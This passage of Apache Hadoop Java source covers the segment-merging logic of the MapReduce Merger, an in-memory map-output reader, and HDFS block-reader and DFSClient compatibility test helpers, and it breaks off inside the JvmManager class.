List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return merge(conf, fs, keyClass, valueClass, segments, mergeFactor,
tmpDir, comparator, reporter, false, readsCounter, writesCounter,
mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments).merge(keyClass, valueClass, mergeFactor, tmpDir,
readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
List<Segment<K, V>> segments,
int mergeFactor,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments, codec).merge(keyClass, valueClass, mergeFactor, tmpDir,
readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
List<Segment<K, V>> segments,
int mergeFactor,
int inMemSegments,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments).merge(keyClass, valueClass, mergeFactor, inMemSegments,
tmpDir, readsCounter, writesCounter, mergePhase);
}
public static <K extends Object, V extends Object> RawKeyValueIterator merge(
Configuration conf,
FileSystem fs,
Class<K> keyClass,
Class<V> valueClass,
CompressionCodec codec,
List<Segment<K, V>> segments,
int mergeFactor,
int inMemSegments,
Path tmpDir,
RawComparator<K> comparator,
Progressable reporter,
boolean sortSegments,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return new MergeQueue<K, V>(conf, fs, segments, comparator, reporter,
sortSegments, codec).merge(keyClass, valueClass, mergeFactor,
inMemSegments, tmpDir, readsCounter, writesCounter, mergePhase);
}
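/**
* Drain the given RawKeyValueIterator into the writer, reporting progress
* every "mapred.merge.recordsBeforeProgress" records (10000 by default).
*/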
public static <K extends Object, V extends Object> void writeFile(
RawKeyValueIterator records,
Writer<K, V> writer,
Progressable progressable,
Configuration conf) throws IOException {
long progressBar = conf.getLong("mapred.merge.recordsBeforeProgress",
10000);
long recordCtr = 0;
while (records.next()) {
writer.append(records.getKey(), records.getValue());
if (((recordCtr++) % progressBar) == 0) {
progressable.progress();
}
}
}
// Boolean variable for including/considering final merge as part of sort
// phase or not. This is true in map task, false in reduce task. It is
// used in calculating mergeProgress.
static boolean includeFinalMerge = false;
/**
* Sets the boolean variable includeFinalMerge to true. Called from map task
* before calling merge() so that final merge of map task is also considered
* as part of sort phase.
*/
static void considerFinalMergeForProgress() {
includeFinalMerge = true;
}
private static class MergeQueue<K extends Object, V extends Object>
extends PriorityQueue<Segment<K, V>> implements RawKeyValueIterator {
Configuration conf;
FileSystem fs;
CompressionCodec codec;
List<Segment<K, V>> segments = new ArrayList<Segment<K,V>>();
RawComparator<K> comparator;
private long totalBytesProcessed;
private float progPerByte;
private Progress mergeProgress = new Progress();
Progressable reporter;
DataInputBuffer key;
DataInputBuffer value;
Segment<K, V> minSegment;
public MergeQueue(Configuration conf,
FileSystem fs,
Path[] inputs,
boolean deleteInputs,
CompressionCodec codec,
RawComparator<K> comparator,
Progressable reporter) throws IOException {
this(conf, fs, inputs, deleteInputs, codec, comparator, reporter, null);
}
public MergeQueue(Configuration conf,
FileSystem fs,
Path[] inputs,
boolean deleteInputs,
CompressionCodec codec,
RawComparator<K> comparator,
Progressable reporter,
Counters.Counter mergedMapOutputsCounter) throws IOException {
this.conf = conf;
this.fs = fs;
this.codec = codec;
this.comparator = comparator;
this.reporter = reporter;
for (Path file : inputs) {
LOG.debug("MergeQ: adding: " + file);
segments.add(new Segment<K, V>(conf, fs, file, codec, !deleteInputs,
(file.toString().endsWith(Task.MERGED_OUTPUT_PREFIX) ? null
: mergedMapOutputsCounter)));
}
// Sort segments on file-lengths
Collections.sort(segments);
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter) {
this(conf, fs, segments, comparator, reporter, false);
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter, boolean sortSegments) {
this.conf = conf;
this.fs = fs;
this.comparator = comparator;
this.segments = segments;
this.reporter = reporter;
if (sortSegments) {
Collections.sort(segments);
}
}
public MergeQueue(Configuration conf, FileSystem fs,
List<Segment<K, V>> segments, RawComparator<K> comparator,
Progressable reporter, boolean sortSegments, CompressionCodec codec) {
this(conf, fs, segments, comparator, reporter, sortSegments);
this.codec = codec;
}
public void close() throws IOException {
Segment<K, V> segment;
while((segment = pop()) != null) {
segment.close();
}
}
public DataInputBuffer getKey() throws IOException {
return key;
}
public DataInputBuffer getValue() throws IOException {
return value;
}
private void adjustPriorityQueue(Segment<K, V> reader) throws IOException {
long startPos = reader.getPosition();
boolean hasNext = reader.nextRawKey();
long endPos = reader.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
if (hasNext) {
adjustTop();
} else {
pop();
reader.close();
}
}
public boolean next() throws IOException {
if (size() == 0)
return false;
if (minSegment != null) {
//minSegment is non-null for all invocations of next except the first
//one. For the first invocation, the priority queue is ready for use
//but for the subsequent invocations, first adjust the queue
adjustPriorityQueue(minSegment);
if (size() == 0) {
minSegment = null;
return false;
}
}
minSegment = top();
long startPos = minSegment.getPosition();
key = minSegment.getKey();
value = minSegment.getValue();
long endPos = minSegment.getPosition();
totalBytesProcessed += endPos - startPos;
mergeProgress.set(totalBytesProcessed * progPerByte);
return true;
}
@SuppressWarnings("unchecked")
protected boolean lessThan(Object a, Object b) {
DataInputBuffer key1 = ((Segment<K, V>) a).getKey();
DataInputBuffer key2 = ((Segment<K, V>) b).getKey();
int s1 = key1.getPosition();
int l1 = key1.getLength() - s1;
int s2 = key2.getPosition();
int l2 = key2.getLength() - s2;
return comparator
.compare(key1.getData(), s1, l1, key2.getData(), s2, l2) < 0;
}
public RawKeyValueIterator merge(
Class<K> keyClass,
Class<V> valueClass,
int factor,
Path tmpDir,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
return merge(keyClass, valueClass, factor, 0, tmpDir, readsCounter,
writesCounter, mergePhase);
}
RawKeyValueIterator merge(
Class<K> keyClass,
Class<V> valueClass,
int factor,
int inMem,
Path tmpDir,
Counters.Counter readsCounter,
Counters.Counter writesCounter,
Progress mergePhase) throws IOException {
LOG.info("Merging " + segments.size() + " sorted segments");
/*
* If there are inMemory segments, then they come first in the segments
* list and then the sorted disk segments. Otherwise (if there are only
* disk segments), then they are sorted segments if there are more than
* factor segments in the segments list.
*/
int numSegments = segments.size();
int origFactor = factor;
int passNo = 1;
if (mergePhase != null) {
mergeProgress = mergePhase;
}
long totalBytes = computeBytesInMerges(factor, inMem);
if (totalBytes != 0) {
progPerByte = 1.0f / (float) totalBytes;
}
// Create the MergeStreams from the sorted map created in the
// constructor and dump the final output to a file.
do {
// Get the factor for this pass of merge. We assume in-memory
// segments are the first entries in the segment list and that
// the pass factor doesn't apply to them.
factor = getPassFactor(factor, passNo, numSegments - inMem);
if (1 == passNo) {
factor += inMem;
}
List<Segment<K, V>> segmentsToMerge = new ArrayList<Segment<K, V>>();
int segmentsConsidered = 0;
int numSegmentsToConsider = factor;
long startBytes = 0; // starting bytes of segments of this merge
while (true) {
// extract the smallest 'factor' number of segments
// Call cleanup on the empty segments (no key/value data)
List<Segment<K, V>> mStream = getSegmentDescriptors(numSegmentsToConsider);
for (Segment<K, V> segment : mStream) {
// Initialize the segment at the last possible moment;
// this helps in ensuring we don't use buffers until we
// need them
segment.init(readsCounter);
long startPos = segment.getPosition();
boolean hasNext = segment.nextRawKey();
long endPos = segment.getPosition();
if (hasNext) {
startBytes += endPos - startPos;
segmentsToMerge.add(segment);
segmentsConsidered++;
} else {
segment.close();
numSegments--; // we ignore this segment for the merge
}
}
// if we have the desired number of segments
// or looked at all available segments, we break
if (segmentsConsidered == factor || segments.size() == 0) {
break;
}
numSegmentsToConsider = factor - segmentsConsidered;
}
// feed the streams to the priority queue
initialize(segmentsToMerge.size());
clear();
for (Segment<K, V> segment : segmentsToMerge) {
put(segment);
}
// If fewer segments remain than the merge factor, just return
// the iterator; otherwise do another single-level merge.
if (numSegments <= factor) {
if (!includeFinalMerge) { // for reduce task
// Reset totalBytesProcessed and recalculate totalBytes from the
// remaining segments to track the progress of the final merge.
// The final merge is counted as progress of the reducePhase,
// the 3rd phase of the reduce task.
totalBytesProcessed = 0;
totalBytes = 0;
for (int i = 0; i < segmentsToMerge.size(); i++) {
totalBytes += segmentsToMerge.get(i).getLength();
LOG.info("#" + i + " 's length "
+ segmentsToMerge.get(i).getLength());
}
}
if (totalBytes != 0) // being paranoid
progPerByte = 1.0f / (float) totalBytes;
totalBytesProcessed += startBytes;
if (totalBytes != 0)
mergeProgress.set(totalBytesProcessed * progPerByte);
else
mergeProgress.set(1.0f); // Last pass and no segments
// left - we're done
LOG.info("Down to the last merge-pass, with " + numSegments
+ " segments left of total size: "
+ (totalBytes - totalBytesProcessed) + " bytes");
return this;
} else {
LOG.info("Merging " + segmentsToMerge.size()
+ " intermediate segments out of a total of "
+ (segments.size() + segmentsToMerge.size()));
long bytesProcessedInPrevMerges = totalBytesProcessed;
totalBytesProcessed += startBytes;
// We want to spread the creation of temp files across multiple
// disks if available, under the space constraints.
long approxOutputSize = 0;
for (Segment<K, V> s : segmentsToMerge) {
approxOutputSize += s.getLength()
+ ChecksumFileSystem.getApproxChkSumLength(s.getLength());
}
Path tmpFilename = new Path(tmpDir, "intermediate").suffix("."
+ passNo);
Path outputFile = lDirAlloc.getLocalPathForWrite(tmpFilename
.toString(), approxOutputSize, conf);
Writer<K, V> writer = new Writer<K, V>(conf, fs, outputFile,
keyClass, valueClass, codec, writesCounter);
writeFile(this, writer, reporter, conf);
writer.close();
// We finished one single-level merge; now clean up the priority queue.
this.close();
// Add the newly created segment to the list of segments to be merged
Segment<K, V> tempSegment = new Segment<K, V>(conf, fs, outputFile,
codec, false);
segments.add(tempSegment);
numSegments = segments.size();
Collections.sort(segments);
// Subtract the difference between the expected size of the new
// segment and its actual size (the expected size is
// inputBytesOfThisMerge) from totalBytes. Expected and actual
// sizes will (almost) match if no combiner is called during the merge.
long inputBytesOfThisMerge = totalBytesProcessed
- bytesProcessedInPrevMerges;
totalBytes -= inputBytesOfThisMerge - tempSegment.getLength();
if (totalBytes != 0) {
progPerByte = 1.0f / (float) totalBytes;
}
passNo++;
}
//we are worried about only the first pass merge factor. So reset the
//factor to what it originally was
factor = origFactor;
} while(true);
}
/**
* Determine the number of segments to merge in a given pass. Assuming more
* than factor segments, the first pass should attempt to bring the total
* number of segments - 1 to be divisible by the factor - 1 (each pass
* takes X segments and produces 1) to minimize the number of merges.
*/
private int getPassFactor(int factor, int passNo, int numSegments) {
if (passNo > 1 || numSegments <= factor || factor == 1)
return factor;
int mod = (numSegments - 1) % (factor - 1);
if (mod == 0)
return factor;
return mod + 1;
}
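// Illustrative worked example (not from the original source): with
// factor = 10 and numSegments = 20, mod = (20 - 1) % (10 - 1) = 1, so the
// first pass merges only mod + 1 = 2 segments. That leaves 19 segments,
// and (19 - 1) is divisible by (10 - 1), so every later pass (including
// the final one) can be a full 10-way merge: 19 -> 10 -> 1.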
/** Return (& remove) the requested number of segment descriptors from the
* sorted map.
*/
private List<Segment<K, V>> getSegmentDescriptors(int numDescriptors) {
if (numDescriptors > segments.size()) {
List<Segment<K, V>> subList = new ArrayList<Segment<K,V>>(segments);
segments.clear();
return subList;
}
List<Segment<K, V>> subList = new ArrayList<Segment<K, V>>(segments
.subList(0, numDescriptors));
for (int i = 0; i < numDescriptors; ++i) {
segments.remove(0);
}
return subList;
}
/**
* Compute expected size of input bytes to merges, will be used in
* calculating mergeProgress. This simulates the above merge() method and
* tries to obtain the number of bytes that are going to be merged in all
* merges(assuming that there is no combiner called while merging).
*
* @param factor
* mapreduce.task.io.sort.factor
* @param inMem
* number of segments in memory to be merged
*/
long computeBytesInMerges(int factor, int inMem) {
int numSegments = segments.size();
List<Long> segmentSizes = new ArrayList<Long>(numSegments);
long totalBytes = 0;
int n = numSegments - inMem;
// factor for 1st pass
int f = getPassFactor(factor, 1, n) + inMem;
n = numSegments;
for (int i = 0; i < numSegments; i++) {
// Not handling empty segments here, assuming that it would not
// affect the calculation of mergeProgress much.
segmentSizes.add(segments.get(i).getLength());
}
// If includeFinalMerge is true, let the following while loop run for
// one more iteration, so that the final merge is included in the
// computation of the expected input bytes of merges.
boolean considerFinalMerge = includeFinalMerge;
while (n > f || considerFinalMerge) {
if (n <= f) {
considerFinalMerge = false;
}
long mergedSize = 0;
f = Math.min(f, segmentSizes.size());
for (int j = 0; j < f; j++) {
mergedSize += segmentSizes.remove(0);
}
totalBytes += mergedSize;
// insert new size into the sorted list
int pos = Collections.binarySearch(segmentSizes, mergedSize);
if (pos < 0) {
pos = -pos - 1;
}
segmentSizes.add(pos, mergedSize);
n -= (f - 1);
f = factor;
}
return totalBytes;
}
public Progress getProgress() {
return mergeProgress;
}
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/task/reduce/InMemoryReader.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred.task.reduce;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.DataInputBuffer;
import org.apache.hadoop.io.WritableUtils;
import org.apache.hadoop.mapred.IFile;
import org.apache.hadoop.mapred.TaskAttemptID;
import org.apache.hadoop.mapred.IFile.IStreamWriter;
import org.apache.hadoop.mapred.IFile.Reader;
import org.apache.hadoop.util.Progressable;
/**
* <code>IFile.InMemoryReader</code> to read map-outputs present in-memory.
*/
public class InMemoryReader<K, V> extends Reader<K, V>
{
private final TaskAttemptID taskAttemptId;
private final MergeManager<K, V> merger;
// DataInputBuffer memDataIn = new DataInputBuffer();
private int start;
private int length;
public InMemoryReader(MergeManager<K, V> merger, TaskAttemptID taskAttemptId, byte[] data,
int start, int length) throws IOException
{
super(null, null, length - start, null, null);
this.merger = merger;
this.taskAttemptId = taskAttemptId;
buffer = data;
bufferSize = (int) fileLength;
dataIn.reset(buffer, start, length);
this.start = start;
this.length = length;
}
@Override
public void reset(int offset)
{
dataIn.reset(buffer, start + offset, length);
bytesRead = offset;
eof = false;
}
@Override
public long getPosition() throws IOException
{
// InMemoryReader does not initialize streams like Reader, so
// in.getPos() would not work. Instead, return the number of
// uncompressed bytes read, which is correct since in-memory
// data is not compressed.
return bytesRead;
}
@Override
public long getLength()
{
return fileLength;
}
private void dumpOnError()
{
File dumpFile = new File("../output/" + taskAttemptId + ".dump");
System.err.println("Dumping corrupt map-output of " + taskAttemptId + " to "
+ dumpFile.getAbsolutePath());
try
{
FileOutputStream fos = new FileOutputStream(dumpFile);
fos.write(buffer, 0, bufferSize);
fos.close();
}
catch (IOException ioe)
{
System.err.println("Failed to dump map-output of " + taskAttemptId);
}
}
@Override
public boolean nextRawKey(DataInputBuffer key) throws IOException
{
try
{
return super.nextRawKey(key);
}
catch (IOException ioe)
{
dumpOnError();
throw ioe;
}
}
@Override
public void nextRawValue(DataInputBuffer value) throws IOException
{
try
{
super.nextRawValue(value);
}
catch (IOException ioe)
{
dumpOnError();
throw ioe;
}
}
@Override
public void close()
{
// Release
dataIn = null;
buffer = null;
// Inform the MergeManager
if (merger != null)
{
merger.unreserve(bufferSize);
}
}
/**
* writing (dumping) byte-array data to output stream.
*/
@Override
public void dumpTo(IStreamWriter writer, Progressable progressable, Configuration conf)
throws IOException
{
writer.write(buffer, start, length - IFile.LEN_OF_EOF);
DataInputBuffer din = new DataInputBuffer();
din.reset(buffer, start + length - IFile.LEN_OF_EOF, IFile.LEN_OF_EOF);
verifyEOF(din);
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/BlockReaderTestUtil.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import java.net.Socket;
import java.net.InetSocketAddress;
import java.io.DataOutputStream;
import java.util.List;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.hdfs.DFSClient.RemoteBlockReader;
import org.apache.hadoop.hdfs.protocol.Block;
import org.apache.hadoop.hdfs.protocol.DatanodeInfo;
import org.apache.hadoop.hdfs.protocol.LocatedBlock;
import org.apache.hadoop.hdfs.server.common.HdfsConstants;
import org.apache.hadoop.hdfs.server.datanode.DataNode;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.net.NetUtils;
import static org.junit.Assert.*;
/**
* A helper class to setup the cluster, and get to BlockReader and DataNode for a block.
*/
public class BlockReaderTestUtil {
private Configuration conf = null;
private MiniDFSCluster cluster = null;
/**
* Setup the cluster
*/
public BlockReaderTestUtil(int replicationFactor) throws Exception {
conf = new Configuration();
conf.setInt("dfs.replication", replicationFactor);
cluster = new MiniDFSCluster(conf, replicationFactor, true, null);
cluster.waitActive();
}
/**
* Shutdown cluster
*/
public void shutdown() {
if (cluster != null) {
cluster.shutdown();
}
}
public MiniDFSCluster getCluster() {
return cluster;
}
public Configuration getConf() {
return conf;
}
/**
* Create a file of the given size filled with test data.
* @return File data.
*/
public byte[] writeFile(Path filepath, int sizeKB)
throws IOException {
FileSystem fs = cluster.getFileSystem();
// Write a file with sizeKB kilobytes of data
DataOutputStream os = fs.create(filepath);
byte data[] = new byte[1024 * sizeKB];
for (int i = 0; i < data.length; i++) {
data[i] = (byte)(i&0xff);
}
// new Random().nextBytes(data);
os.write(data);
os.close();
return data;
}
/**
* Get the list of Blocks for a file.
*/
public List<LocatedBlock> getFileBlocks(Path filepath, int sizeKB)
throws IOException {
// Return the blocks we just wrote
DFSClient dfsclient = getDFSClient();
return dfsclient.namenode.getBlockLocations(
filepath.toString(), 0, sizeKB * 1024).getLocatedBlocks();
}
/**
* Get the DFSClient.
*/
public DFSClient getDFSClient() throws IOException {
InetSocketAddress nnAddr = new InetSocketAddress("localhost", cluster.getNameNodePort());
return new DFSClient(nnAddr, conf);
}
/**
* Exercise the BlockReader and read length bytes.
*
* It does not verify the bytes read.
*/
public void readCasually(BlockReader reader, int length, boolean expectEof)
throws IOException {
byte buf[] = new byte[1024];
int nRead = 0;
while (nRead < length) {
DFSClient.LOG.info("So far read " + nRead + " - going to read more.");
int n = reader.read(buf, 0, buf.length);
assertTrue(n > 0);
nRead += n;
}
if (expectEof) {
DFSClient.LOG.info("Done reading, expect EOF for next read.");
assertEquals(-1, reader.read(buf, 0, buf.length));
}
}
/**
* Get a BlockReader for the given block.
*/
public BlockReader getBlockReader(LocatedBlock testBlock, int offset, int lenToRead)
throws IOException {
InetSocketAddress targetAddr = null;
Socket sock = null;
BlockReader blockReader = null;
Block block = testBlock.getBlock();
DatanodeInfo[] nodes = testBlock.getLocations();
targetAddr = NetUtils.createSocketAddr(nodes[0].getName());
sock = new Socket();
sock.connect(targetAddr, HdfsConstants.READ_TIMEOUT);
sock.setSoTimeout(HdfsConstants.READ_TIMEOUT);
return RemoteBlockReader.newBlockReader(
sock, targetAddr.toString()+ ":" + block.getBlockId(), block.getBlockId(),
testBlock.getBlockToken(),
block.getGenerationStamp(),
offset, lenToRead,
conf.getInt("io.file.buffer.size", 4096));
}
/**
* Get a DataNode that serves our testBlock.
*/
public DataNode getDataNode(LocatedBlock testBlock) {
DatanodeInfo[] nodes = testBlock.getLocations();
int ipcport = nodes[0].ipcPort;
return cluster.getDataNode(ipcport);
}
}
<|start_filename|>src/test/org/apache/hadoop/hdfs/TestDfsClientCreateParentCompatibility.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.hdfs;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.fail;
import static org.mockito.Matchers.anyBoolean;
import static org.mockito.Matchers.anyLong;
import static org.mockito.Matchers.anyObject;
import static org.mockito.Matchers.anyShort;
import static org.mockito.Matchers.eq;
import static org.mockito.Mockito.doAnswer;
import static org.mockito.Mockito.doThrow;
import static org.mockito.Mockito.mock;
import java.io.IOException;
import java.util.Arrays;
import java.util.concurrent.atomic.AtomicInteger;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FSDataOutputStream;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.hdfs.server.namenode.NameNode;
import org.apache.hadoop.ipc.RemoteException;
import org.junit.Test;
import org.mockito.invocation.InvocationOnMock;
import org.mockito.stubbing.Answer;
/**
* This test verifies that new DFSClients handle exceptions that would be
* thrown by older NameNodes (pre cdh3u3, pre apache 0.21).
*
* This is a CDH3 specific backwards compatibility test.
*/
public class TestDfsClientCreateParentCompatibility {
public static final Log LOG = LogFactory
.getLog(TestDfsClientCreateParentCompatibility.class);
@Test
public void testCreateWithoutDirsCompatibility() throws IOException {
Configuration conf = new Configuration();
NameNode nn = mock(NameNode.class);
final String err =
"java.io.IOException: " +
"java.lang.NoSuchMethodException: org.apache.hadoop.hdfs." +
"protocol.ClientProtocol.create(java.lang.String, " +
"org.apache.hadoop.fs.permission.FsPermission, " +
"java.lang.String, boolean, boolean, short, long)";
final AtomicInteger newCount = new AtomicInteger();
Answer<Void> newCallCounter = new Answer<Void>() {
@Override
public Void answer(InvocationOnMock invocation) throws Throwable {
LOG.info("New Call "+ Arrays.toString(invocation.getArguments()));
newCount.incrementAndGet();
throw new RemoteException(IOException.class.getName(), err);
}
};
final AtomicInteger oldCount = new AtomicInteger();
Answer<Void> oldCallCounter = new Answer<Void>() {
@Override
public Void answer(InvocationOnMock invocation) throws Throwable {
LOG.info("Old Call "+ Arrays.toString(invocation.getArguments()));
oldCount.incrementAndGet();
return null;
}
};
// new api client call
doAnswer(newCallCounter).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), eq(false), anyShort(), anyLong());
// old api client call
doAnswer(oldCallCounter).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), anyShort(), anyLong());
DFSClient client = new DFSClient(null, nn, conf, null);
boolean createParent = false;
client.create("foo", null, false, createParent, (short) 1, 512, null, 512);
client.create("bar", null, false, createParent, (short) 1, 512, null, 512);
client.create("baz", null, false, createParent, (short) 1, 512, null, 512);
// no exception was thrown, three calls to the old version.
assertEquals(3, oldCount.get());
assertEquals(1, newCount.get());
}
@Test(expected=IOException.class)
public void testCreateWithException() throws IOException {
Configuration conf = new Configuration();
NameNode nn = mock(NameNode.class);
// new api client call
Exception e = new RemoteException(IOException.class.getName(),
"Other remote exception");
doThrow(e).when(nn)
.create((String)anyObject(), (FsPermission)anyObject(),
(String)anyObject(), anyBoolean(), eq(false), anyShort(), anyLong());
DFSClient client = new DFSClient(null, nn, conf, null);
boolean createParent = false;
client.create("foo", null, false, createParent, (short) 1, 512, null, 512);
fail("Expected an IOException");
}
/**
* Small testing program that attempts to call createNonRecursive.
*/
public static void main(String argv[]) throws IOException {
Configuration conf = new Configuration();
FileSystem fs = FileSystem.get(conf);
Path p = new Path(argv[0]);
FSDataOutputStream out = fs.createNonRecursive(p, true, 512, (short) 1,
512, null);
out.close();
fs.close();
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JvmManager.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import java.io.File;
import java.io.IOException;
import java.net.InetSocketAddress;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Iterator;
import java.util.List;
import java.util.Map;
import java.util.Random;
import java.util.Vector;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.locks.ReentrantLock;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.mapred.CleanupQueue.PathDeletionContext;
import org.apache.hadoop.mapred.TaskTracker.TaskInProgress;
import org.apache.hadoop.mapreduce.TaskType;
import org.apache.hadoop.mapreduce.server.tasktracker.JVMInfo;
import org.apache.hadoop.mapreduce.server.tasktracker.userlogs.JvmFinishedEvent;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.util.ProcessTree;
import org.apache.hadoop.util.StringUtils;
import org.apache.hadoop.util.ProcessTree.Signal;
import org.apache.hadoop.util.Shell.ShellCommandExecutor;
class JvmManager {
public static final Log LOG = LogFactory
.getLog("org.apache.hadoop.mapred.JvmManager");
private JvmManagerForType mapJvmManager;
private JvmManagerForType reduceJvmManager;
public JvmEnv constructJvmEnv(List<String> setup, Vector<String> vargs,
File stdout, File stderr, long logSize, File workDir, JobConf conf) {
return new JvmEnv(setup, vargs, stdout, stderr, logSize, workDir, conf);
}
public JvmManager(TaskTracker tracker) throws IOException {
mapJvmManager = new JvmManagerForType(tracker.getMaxCurrentMapTasks(),
true, tracker);
reduceJvmManager = new JvmManagerForType(
tracker.getMaxCurrentReduceTasks(), false, tracker);
}
// called from unit tests
JvmManagerForType getJvmManagerForType(TaskType type) {
if (type.equals(TaskType.MAP)) {
return mapJvmManager;
} else if (type.equals(TaskType.REDUCE)) {
return reduceJvmManager;
}
return null;
}
/*
* Saves pid of the given taskJvm
*/
void setPidToJvm(JVMId jvmId, String pid) {
if (jvmId.isMapJVM()) {
mapJvmManager.jvmIdToPid.put(jvmId, pid);
} else {
reduceJvmManager.jvmIdToPid.put(jvmId, pid);
}
}
/*
* Returns the pid of the task
*/
String getPid(TaskRunner t) {
if (t != null && t.getTask() != null) {
if (t.getTask().isMapTask()) {
JVMId id = mapJvmManager.runningTaskToJvm.get(t);
if (id != null) {
return mapJvmManager.jvmIdToPid.get(id);
}
} else {
JVMId id = reduceJvmManager.runningTaskToJvm.get(t);
if (id != null) {
return reduceJvmManager.jvmIdToPid.get(id);
}
}
}
return null;
}
public void stop() throws IOException, InterruptedException {
mapJvmManager.stop();
reduceJvmManager.stop();
}
public boolean isJvmKnown(JVMId jvmId) {
if (jvmId.isMapJVM()) {
return mapJvmManager.isJvmknown(jvmId);
} else {
return reduceJvmManager.isJvmknown(jvmId);
}
}
public void launchJvm(TaskRunner t, JvmEnv env) throws IOException,
InterruptedException {
if (t.getTask().isMapTask()) {
mapJvmManager.reapJvm(t, env);
} else {
reduceJvmManager.reapJvm(t, env);
}
}
public boolean validateTipToJvm(TaskInProgress tip, JVMId jvmId) {
if (jvmId.isMapJVM()) {
return mapJvmManager.validateTipToJvm(tip, jvmId);
} else {
return reduceJvmManager.validateTipToJvm(tip, jvmId);
}
}
public TaskInProgress getTaskForJvm(JVMId jvmId) throws IOException {
if (jvmId.isMapJVM()) {
